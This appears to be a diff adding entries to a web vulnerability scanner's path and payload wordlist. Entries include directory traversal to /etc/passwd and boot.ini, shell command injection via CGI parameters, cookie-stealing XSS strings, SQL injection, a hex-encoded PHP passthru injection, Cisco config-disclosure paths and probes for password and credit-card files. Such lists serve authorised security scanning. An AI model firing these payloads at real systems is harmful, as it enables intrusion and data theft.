+scripts/samples/search/qsumrhit.htw +JUNK(5).htw + + +ttp://127.0.0.1:2301/ +file/../../../../../../../../etc/ +level/16/exec/-///pwd +level/16/exec/-///show/configuration +level/16 +level/16/exec/ +level/16/exec//show/access-lists +level/16/level/16/exec//show/configuration +level/16/level/16/exec//show/interfaces +level/16/level/16/exec//show/interfaces/status +level/16/level/16/exec//show/version +level/16/level/16/exec//show/running-config/interface/FastEthernet +level/16/exec//show +level/17/exec//show +level/18/exec//show +level/19/exec//show +level/20/exec//show +level/21/exec//show +level/22/exec//show +level/23/exec//show +level/24/exec//show +level/25/exec//show +level/26/exec//show +level/27/exec//show +level/28/exec//show +level/29/exec//show +level/30/exec//show +level/31/exec//show +level/32/exec//show +level/33/exec//show +level/34/exec//show +level/35/exec//show +level/36/exec//show +level/37/exec//show +level/38/exec//show +level/39/exec//show +level/40/exec//show +level/41/exec//show +level/42/exec//show +level/43/exec//show +level/44/exec//show +level/45/exec//show +level/46/exec//show +level/47/exec//show +level/48/exec//show +level/49/exec//show +level/50/exec//show +level/51/exec//show +level/52/exec//show +level/53/exec//show +level/54/exec//show +level/55/exec//show +level/56/exec//show +level/57/exec//show +level/58/exec//show +level/59/exec//show +level/60/exec//show +level/61/exec//show +level/62/exec//show +level/63/exec//show +level/64/exec//show +level/65/exec//show +level/66/exec//show +level/67/exec//show +level/68/exec//show +level/69/exec//show +level/70/exec//show +level/71/exec//show +level/72/exec//show +level/73/exec//show +level/74/exec//show +level/75/exec//show +level/76/exec//show +level/77/exec//show +level/78/exec//show +level/79/exec//show +level/80/exec//show +level/81/exec//show +level/82/exec//show +level/83/exec//show +level/84/exec//show +level/85/exec//show +level/86/exec//show +level/87/exec//show 
+level/88/exec//show +level/89/exec//show +level/90/exec//show +level/91/exec//show +level/92/exec//show +level/93/exec//show +level/94/exec//show +level/95/exec//show +level/96/exec//show +level/97/exec//show +level/98/exec//show +level/99/exec//show +gallery/captionator.php +gallery/errors/configmode.php +gallery/errors/needinit.php +gallery/errors/reconfigure.php +gallery/errors/unconfigured.php +users.lst +WS_FTP.LOG +basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu +examples/jsp/snp/snoop.jsp +nsn/env.bas +lcgi/lcgitest.nlm +com/ +com/novell/ +com/novell/webaccess +cgi-bin/ +index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc +index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd +cgi-bin/ccbill-local.pl?cmd=MENU +cgi-bin/ccbill-local.cgi?cmd=MENU +cgi-bin/mastergate/search.cgi?search=0&search_on=all +cgi-bin/Backup/add-passwd.cgi +cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message +cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls +cgi-bin/bslist.cgi?email=x;ls +cgi-bin/bsguest.cgi?email=x;ls +cgi-bin/nbmember.cgi?cmd=list_all_users +/admin/admin.shtml +axis-cgi/buffer/command.cgi +support/messages +cgi-bin/where.pl?sd=ls%20/etc +cgi-bin/ +index.php?err=3&email=\"><script>alert(document.cookie)</script> +forgot_password.php?email=\"><script>alert(document.cookie)</script> +bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> +bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> +eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> +eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> +index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 +some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 +some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 +some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 
+index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 
+NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20 +cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd +cgi-bin/phf +cgi-bin/upload.cgi +upload.cgi+ +server-status +?PageServices +?wp-cs-dump +cfdocs.map +publisher/ +cgi-bin/nph-publish.cgi +cgi-bin/nph-test-cgi +cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd +cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' +cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd +cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' +counter/1/n/n/0/3/5/0/a/123.gif +iissamples/exair/search/search.asp +cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD +../webserver.ini + +na_admin/ + + +cpqlogin.htm +cpqlogin.htm + + + + + + + + + + + + + + + + + + + + +main_page.php + +cpanel/ +shopexd.asp?catalogid='42 +shopping/diag_dbtest.asp +_vti_bin/fpcount.exe/ +forum/index.php?method=<script>alert('Vulnerable')</script> +zorum/index.php?method=<script>alert('Vulnerable')</script> +wwwboard/passwd.txt +login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> +login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> +SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> +SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> +acart2_0/signin.asp?msg=<script>alert(\"test\")</script> +ows-bin/perlidlc.bat?&dir +photo/ +photodata/ +cgi-bin/photo/ +iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full 
+iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full +null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full + +jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini +jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd +cgi-bin/include/new-visitor.inc.php +%3f.jsp +%3f.jsp +msadc/msadcs.dll +./../../../../../../../../../etc/* +./../../../../../../../../../etc/passw* +bytehoard/index.php?infolder=../../../../../../../../../../../etc/ +Search +musicqueue.cgi +cgi-bin/musicqueue.cgi +scripts/tools/newdsn.exe +OpenFile.aspx?file=../../../../../../../../../../boot.ini +cgi-bin/windmail +cgi-bin/windmail.exe +cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini% +cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\ +index.php?vo=\"><script>alert(document.cookie);</script> +.../.../.../.../.../.../.../.../.../.../etc/passwd +cgi-bin/dose.pl?daily&somefile.txt&|ls| +admin/database/wwForum.mdb +../config.dat +iisadmpwd/aexp2.htr +iisadmpwd/aexp2b.htr +iisadmpwd/aexp3.htr +iisadmpwd/aexp4.htr +iisadmpwd/aexp4b.htr +/admin/aindex.htm +cgi-bin/gbadmin.cgi?action=change_adminpass +cgi-bin/gbadmin.cgi?action=change_automail +cgi-bin/gbadmin.cgi?action=colors +cgi-bin/gbadmin.cgi?action=setup +cgi-bin/gbpass.pl +shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> +hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script> +admin/wg_user-info.ml +banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/* +c32web.exe/ChangeAdminPassword +showmail.pl +reademail.pl +showmail.pl?Folder=<script>alert(document.cookie)</script> +iissamples/exair/search/query.asp +index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere] +index.php?offset=[%20Problem%20Here%20] +buddies.blt +buddy.blt +buddylist.blt +cgi-sys/addalink.cgi +cgi-sys/cgiecho +cgi-sys/cgiemail 
+cgi-sys/countedit +cgi-sys/domainredirect.cgi +cgi-sys/entropybanner.cgi +cgi-sys/entropysearch.cgi +cgi-sys/FormMail-clone.cgi +cgi-sys/helpdesk.cgi +cgi-sys/mchat.cgi +cgi-sys/randhtml.cgi +cgi-sys/realhelpdesk.cgi +cgi-sys/realsignup.cgi +cgi-sys/scgiwrap +cgi-sys/signup.cgi +pdf/ +sqlnet.log +cgi-bin/GW5/GWWEB.EXE +.psql_history +acceso/ +access-log +access.log +access/ +access_log +acciones/ +account/ +accounting/ +activex/ +adm/ +admin.htm +admin.html +admin.php +admin.php3 +admin.shtml +admin/ +Administration/ +administration/ +administrator/ +Admin_files/ +advwebadmin/ +Agent/ +Agentes/ +agentes/ +Agents/ +analog/ +apache/ +app/ +applicattion/ +applicattions/ +apps/ +archivar/ +archive/ +archives/ +archivo/ +asp/ +Asp/ +atc/ +auth/ +awebvisit.stat +ayuda/ +backdoor/ +backup/ +bak/ +banca/ +banco/ +bank/ +bbv/ +bdata/ +bdatos/ +beta/ +bin/ +boot/ +buy/ +buynow/ +c/ +cache-stats/ +caja/ +card/ +cards/ +cart/ +cash/ +ccard/ +ccbill/secure/ccbill.log +cd/ +cdrom/ +cert/ +certificado/ +certificate +certificates +cfdocs/exampleapp/email/application.cfm +cfdocs/exampleapp/publish/admin/addcontent.cfm +cfdocs/exampleapp/publish/admin/application.cfm +cfdocs/examples/httpclient/mainframeset.cfm +cgi-bin/dbmlparser.exe +cgi-bin/icat +client/ +cliente/ +clientes/ +clients/ +cm/ +code/ +communicator/ +compra/ +compras/ +compressed/ +conecta/ +config/ +config/checks.txt +connect/ +console +correo/ +counter/ +credit/ +crypto/ +css +cuenta/ +cuentas/ +customers/ +dan_o.dat +dat/ +data/ +dato/ +datos/ +db/ +dbase/ +demo/ +demos/ +dev/ +devel/ +development/ +dir/ +directory/ +DMR/ +doc-html/ +down/ +download/ +downloads/ +easylog/easylog.html +ejemplo/ +ejemplos/ +employees/ +envia/ +enviamail/ +error_log +es/ +excel/ +Excel/ +EXE/ +exe/ +fbsd/ +file/ +fileadmin/ +files/ +forum/ +forums/ +foto/ +fotos/ +fpadmin/ +ftp/ +gfx/ +global/ +graphics/ +guest/ +guestbook/ +guests/ +hidden/ +hitmatic/ +hitmatic/analyse.cgi +hits.txt +hit_tracker/ +home/ +homepage/ +htdocs/ +html/ 
+htpasswd +HyperStat/stat_what.log +hyperstat/stat_what.log +ibill/ +idea/ +ideas/ +imagenes/ +img/ +imgs/ +import/ +impreso/ +includes/ +incoming/ +info/ +informacion/ +information/ +ingresa/ +ingreso/ +install/ +internal/ +intranet/ +invitado/ +invitados/ +java-plugin/ +java/ +jdbc/ +job/ +jrun/ +js +lib/ +library/ +libro/ +linux/ +log.htm +log.html +log.txt +logfile +logfile.htm +logfile.html +logfile.txt +logfile/ +logfiles/ +logger.html +logger/ +logging/ +login/ +logs.txt +logs/ +logs/access_log +logs/error_log +lost+found/ +mail/ +manage/cgi/cgiproc +marketing/ +master.password +mbox +members/ +message/ +messaging/ +ministats/admin.cgi +misc/ +mkstats/ +movimientos/ +mp3/ +mqseries/ +msql/ +msword/ +Msword/ +MSword/ +NetDynamic/ +NetDynamics/ +netscape/ +new +new/ +news +nl/ +noticias/ +odbc/ +officescan/cgi/jdkRqNotify.exe +old/ +oracle +oradata/ +order/ +orders/ +orders/checks.txt +orders/mountain.cfg +orders/orders.log +orders/orders.txt +outgoing/ +ows/ +pages/ +Pages/ +passwd +passwd.adjunct +passwd.txt +passwdfile +password +password/ +passwords.txt +passwords/ +PDG_Cart/ +people.list +perl5/ +php/ +phpmyadmin/ +phpMyAdmin/ +pics/ +piranha/secure/passwd.php3 +pix/ +poll +polls +porn/ +pr0n/ +privado/ +private/ +prod/ +pron/ +prueba/ +pruebas/ +pub/ +public/ +publica/ +publicar/ +publico/ +purchase/ +purchases/ +pw/ +pwd.db +python/ +readme +README.TXT +readme.txt +register/ +registered/ +reports/ +reseller/ +restricted/ +retail/ +reviews/newpro.cgi +root/ +sales/ +sample/ +samples/ +save/ +scr/ +scratch +scripts/weblog +search.vts +search97.vts +secret/ +secure/ +secured/ +sell/ +server_stats/ +service/ +services/ +servicio/ +servicios/ +setup/ +shop/ +shopper/ +software/ +solaris/ +source/ +Sources/ +spwd +sql/ +src/ +srchadm +ss.cfg +ssi/ +staff/ +stat.htm +stat/ +statistic/ +Statistics/ +statistics/ +stats.htm +stats.html +stats.txt +stats/ +Stats/ +status/ +store/ +StoreDB/ +stylesheet/ +stylesheets/ +subir/ +sun/ +super_stats/access_logs 
+super_stats/error_logs
+support/
+swf
+sys/
+system/
+tar/
+tarjetas/
+temp/
+template/
+temporal/
+test.htm
+test.html
+test.txt
+test/
+testing/
+tests/
+tmp/
+tools/
+tpv/
+trabajo/
+trafficlog/
+transito/
+tree/
+trees/
+updates/
+user/
+users/
+users/scripts/submit.cgi
+ustats/
+usuario/
+usuarios/
+vfs/
+w3perl/admin
+warez/
+web/
+web800fo/
+webaccess.htm
+webaccess/access-options.txt
+webadmin/
+webboard/
+webcart-lite/
+webcart/
+webdata/
+weblog/
+weblogs/
+webmaster_logs/
+WebShop/
+WebShop/logs/cc.txt
+WebShop/templates/cc.txt
+website/
+webstats/
+WebTrend/
+Web_store/
+windows/
+word/
+work/
+wstats/
+wusage/
+www-sql/
+www/
+wwwboard/wwwboard.cgi
+wwwboard/wwwboard.pl
+wwwjoin/
+wwwlog/
+wwwstats.html
+wwwstats/
+wwwthreads/3tvars.pm
+wwwthreads/w3tvars.pm
+zipfiles/
+_pages
+cgi-bin/
+cgi-bin/.fhp
+cgi-bin/add_ftp.cgi
+cgi-bin/admin.cgi
+cgi-bin/admin.php
+cgi-bin/admin.php3
+cgi-bin/admin.pl
+cgi-bin/adminhot.cgi
+cgi-bin/adminwww.cgi
+cgi-bin/AnyBoard.cgi
+cgi-bin/AnyForm
+cgi-bin/AnyForm2
+cgi-bin/ash
+cgi-bin/ax-admin.cgi
+cgi-bin/ax.cgi
+cgi-bin/axs.cgi
+cgi-bin/bash
+cgi-bin/bnbform
+cgi-bin/bnbform.cgi
+cgi-bin/cart.pl
+cgi-bin/cgimail.exe
+cgi-bin/classifieds
+cgi-bin/classifieds.cgi
+cgi-bin/clickcount.pl?view=test
+cgi-bin/code.php
+cgi-bin/code.php3
+cgi-bin/count.cgi
+cgi-bin/csh
+cgi-bin/cstat.pl
+cgi-bin/c_download.cgi
+cgi-bin/dasp/fm_shell.asp
+cgi-bin/day5datacopier.cgi
+cgi-bin/dfire.cgi
+cgi-bin/dig.cgi
+cgi-bin/displayTC.pl
+cgi-bin/edit.pl
+cgi-bin/enter.cgi
+cgi-bin/environ.cgi
+cgi-bin/environ.pl
+cgi-bin/ex-logger.pl
+cgi-bin/excite
+cgi-bin/filemail
+cgi-bin/filemail.pl
+cgi-bin/ftp.pl
+cgi-bin/ftpsh
+cgi-bin/getdoc.cgi
+cgi-bin/glimpse
+cgi-bin/hitview.cgi
+cgi-bin/jailshell
+cgi-bin/jj
+cgi-bin/ksh
+cgi-bin/log-reader.cgi
+cgi-bin/log/
+cgi-bin/login.cgi
+cgi-bin/login.pl
+cgi-bin/logit.cgi
+cgi-bin/logs.pl
+cgi-bin/logs/
+cgi-bin/logs/access_log
+cgi-bin/logs/error_log
+cgi-bin/lookwho.cgi
+cgi-bin/maillist.cgi
+cgi-bin/maillist.pl
+cgi-bin/man.sh
+cgi-bin/meta.pl
+cgi-bin/minimal.exe
+cgi-bin/nlog-smb.cgi
+cgi-bin/nlog-smb.pl
+cgi-bin/noshell
+cgi-bin/nph-publish
+cgi-bin/ntitar.pl
+cgi-bin/pass
+cgi-bin/passwd
+cgi-bin/passwd.txt
+cgi-bin/password
+cgi-bin/post_query
+cgi-bin/pu3.pl
+cgi-bin/ratlog.cgi
+cgi-bin/responder.cgi
+cgi-bin/rguest.exe
+cgi-bin/rksh
+cgi-bin/rsh
+cgi-bin/search.cgi
+cgi-bin/search.pl
+cgi-bin/session/adminlogin
+cgi-bin/sh
+cgi-bin/show.pl
+cgi-bin/stat/
+cgi-bin/stats-bin-p/reports/index.html
+cgi-bin/stats.pl
+cgi-bin/stats.prf
+cgi-bin/stats/
+cgi-bin/statsconfig
+cgi-bin/stats_old/
+cgi-bin/statview.pl
+cgi-bin/survey
+cgi-bin/survey.cgi
+cgi-bin/tablebuild.pl
+cgi-bin/tcsh
+cgi-bin/test.cgi
+cgi-bin/test/test.cgi
+cgi-bin/textcounter.pl
+cgi-bin/tidfinder.cgi
+cgi-bin/tigvote.cgi
+cgi-bin/tpgnrock
+cgi-bin/ultraboard.cgi
+cgi-bin/ultraboard.pl
+cgi-bin/viewlogs.pl
+cgi-bin/visitor.exe
+cgi-bin/w3-msql
+cgi-bin/w3-sql
+cgi-bin/webais
+cgi-bin/webbbs.cgi
+cgi-bin/webbbs.exe
+cgi-bin/webutil.pl
+cgi-bin/webutils.pl
+cgi-bin/webwho.pl
+cgi-bin/wguest.exe
+cgi-bin/www-sql
+cgi-bin/wwwboard.cgi.cgi
+cgi-bin/wwwboard.pl
+cgi-bin/wwwstats.pl
+cgi-bin/wwwthreads/3tvars.pm
+cgi-bin/wwwthreads/w3tvars.pm
+cgi-bin/zsh
+adsamples/config/site.csc
+advworks/equipment/catalog_type.asp
+carbo.dll
+clocktower/
+localstart.asp
+market/
+mspress30/
+sam
+sam.bin
+sam._
+samples/search/queryhit.htm
+scripts/counter.exe
+scripts/cphost.dll
+scripts/fpadmcgi.exe
+scripts/postinfo.asp
+scripts/samples/ctguestb.idc
+scripts/samples/search/webhits.exe
+site/iissamples/
+vc30/
+_mem_bin/
+_mem_bin/FormsLogin.asp
+perl/files.pl
+perl5/files.pl
+scripts/convert.bas
+owa_util%2esignature
+cgi-dos/args.bat
+custdata/
+hostingcontroller/
+data.sql
+databases/
+databse.sql
+db.sql
+etc/passwd
+img-sys/
+java-sys/
+javadoc/
+log/
+manager/
+manual/
+exchange/
+pls/admin
+account.nsf
+accounts.nsf
+admin.nsf
+admin4.nsf
+admin5.nsf
+agentrunner.nsf
+alog.nsf
+archive/a_domlog.nsf
+archive/l_domlog.nsf
+a_domlog.nsf
+billing.nsf
+bookmark.nsf
+books.nsf
+busytime.nsf
+calendar.nsf
+certa.nsf
+certlog.nsf
+certsrv.nsf
+chatlog.nsf
+clbusy.nsf
+cldbdir.nsf
+clusta4.nsf
+collect4.nsf
+cpa.nsf
+customerdata.nsf
+da.nsf
+database.nsf
+db.nsf
+dclf.nsf
+DEASAppDesign.nsf
+DEASLog.nsf
+DEASLog01.nsf
+DEASLog02.nsf
+DEASLog03.nsf
+DEASLog04.nsf
+DEASLog05.nsf
+decsadm.nsf
+decsdoc.nsf
+decslog.nsf
+DEESAdmin.nsf
+default.nsf
+dirassist.nsf
+doladmin.nsf
+dols_help.nsf
+domadmin.nsf
+domcfg.nsf
+event.nsf
+events.nsf
+events5.nsf
+group.nsf
+groups.nsf
+help5_admin.nsf
+help5_client.nsf
+help5_designer.nsf
+homepage.nsf
+iNotes/Forms5.nsf
+iNotes/Forms5.nsf/$DefaultNav
+jotter.nsf
+kbccv11.nsf
+kbnv11.nsf
+kbssvv11.nsf
+lcon.nsf
+ldap.nsf
+leiadm.nsf
+leilog.nsf
+leivlt.nsf
+log4a.nsf
+lsxlc.nsf
+l_domlog.nsf
+mab.nsf
+mail/adminisist.nsf
+mail1.box
+mail10.box
+mail2.box
+mail3.box
+mail4.box
+mail5.box
+mail6.box
+mail7.box
+mail8.box
+mail9.box
+mailw46.nsf
+msdwda.nsf
+mtatbls.nsf
+mtdata/mtstore.nsf
+mtstore.nsf
+nntp/nd000000.nsf
+nntp/nd000001.nsf
+nntp/nd000002.nsf
+nntp/nd000003.nsf
+nntp/nd000004.nsf
+nntppost.nsf
+notes.nsf
+ntsync4.nsf
+ntsync45.nsf
+perweb.nsf
+private.nsf
+public.nsf
+qpadmin.nsf
+quickplace/quickplace/main.nsf
+quickstart/qstart50.nsf
+quickstart/wwsample.nsf
+readme.nsf
+reports.nsf
+sample/faqw46
+sample/framew46
+sample/pagesw46
+sample/siregw46
+sample/site1w4646
+sample/site2w4646
+sample/site3w4646
+schema50.nsf
+secret.nsf
+setupweb.nsf
+smbcfg.nsf
+smconf.nsf
+smency.nsf
+smmsg.nsf
+smquar.nsf
+smsolar.nsf
+smtime.nsf
+smtp.box
+smtp.nsf
+smtpibwq.nsf
+smtpobwq.nsf
+smtptbls.nsf
+smvlog.nsf
+software.nsf
+srvnam.htm
+statmail.nsf
+stauths.nsf
+stautht.nsf
+stconf.nsf
+stconfig.nsf
+stdnaset.nsf
+stdomino.nsf
+stlog.nsf
+streg.nsf
+stsrc.nsf
+test.nsf
+today.nsf
+userreg.nsf
+users.nsf
+vpuserinfo.nsf
+web.nsf
+webuser.nsf
+welcome.nsf
+wksinst.nsf
+finance.xls
+finances.xls
+abonnement.asp
+acartpath/signin.asp?|-|0|404_Object_Not_Found +add_acl +admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] +admin/auth.php +admin/cfg/configscreen.inc.php+ +admin/cfg/configsite.inc.php+ +admin/cfg/configsql.inc.php+ +admin/cfg/configtache.inc.php+ +admin/cms/htmltags.php +admin/credit_card_info.php +admin/exec.php3 +admin/index.php +admin/modules/cache.php+ +admin/objects.inc.php4 +admin/script.php +admin/settings.inc.php+ +admin/templates/header.php +admin/upload.php +admin_t/include/aff_liste_langue.php +adv/gm001-mc/ +aff_news.php +approval/ts_app.htm +archive.asp +archive_forum.asp +ashnews.php +auth.inc.php +b2-tools/gm-2-b2.php +bandwidth/index.cgi +basilix.php3 +bigsam_guestbook.php?displayBegin=9999...9999 +bin/common/user_update_passwd.pl +biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found +biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found +board/index.php +board/philboard_admin.asp+ +boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found +bugtest+/+ +caupo/admin/admin_workspace.php +ccbill/whereami.cgi +chat_dir/register.php +checkout_payment.php +communique.asp +community/forumdisplay.php +community/index.php?analized=anything +community/member.php +compte.php +config/html/cnf_gi.htm +convert-date.php +cp/rac/nsManager.cgi +CSNews.cgi +csPassword.cgi?command=remove%20 +cutenews/comments.php +cutenews/search.php +cutenews/shownews.php +Data/settings.xml+ +database/metacart.mdb+ +db.php +dbabble +dcp/advertiser.php +defines.php +dltclnt.php +doc/admin/index.php +docs/NED +dotproject/modules/files/index_table.php +dotproject/modules/projects/addedit.php +dotproject/modules/projects/view.php +dotproject/modules/projects/vw_files.php +dotproject/modules/tasks/addedit.php +dotproject/modules/tasks/viewgantt.php +do_map +do_subscribe +email.php +emml_email_func.php +emumail.cgi?type=.%00 +entete.php +enteteacceuil.php +etc/shadow+ +eventcal2.php.php 
+ez2000/ezadmin.cgi +ez2000/ezboard.cgi +ez2000/ezman.cgi +faqman/index.php +filemanager/index.php3 +filemgmt/brokenfile.php +filemgmt/singlefile.php +filemgmt/viewcat.php +filemgmt/visit.php +foro/YaBB.pl +forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd +forum-ra.asp?n=../../../../../../../../../etc/passwd +forum-ra.asp?n=../../../../../../../../../etc/passwd%00 +forum-ra.asp?n=/../../../../../../../../../../../boot.ini +forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum-ra.asp?n=/etc/passwd +forum-ra.asp?n=/etc/passwd%00 +forum-ra.asp?n=c:\boot.ini +forum-ra_professionnel.asp?n=%60/etc/passwd%60 +forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00 +forum-ra_professionnel.asp?n=../../boot.ini +forum-ra_professionnel.asp?n=/....../boot.ini +forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum-ra_professionnel.asp?n=/../../../../../../etc/passwd +forum-ra_professionnel.asp?n=/../../../etc/passwd +forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum-ra_professionnel.asp?n=/etc/passwd +forum-ra_professionnel.asp?n=/etc/passwd%00 +forum-ra_professionnel.asp?n=c:\boot.ini +forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. 
+forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +forum/mainfile.php +forum/member.php +forum/newreply.php +forum/newthread.php +forum/viewtopic.php +forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. 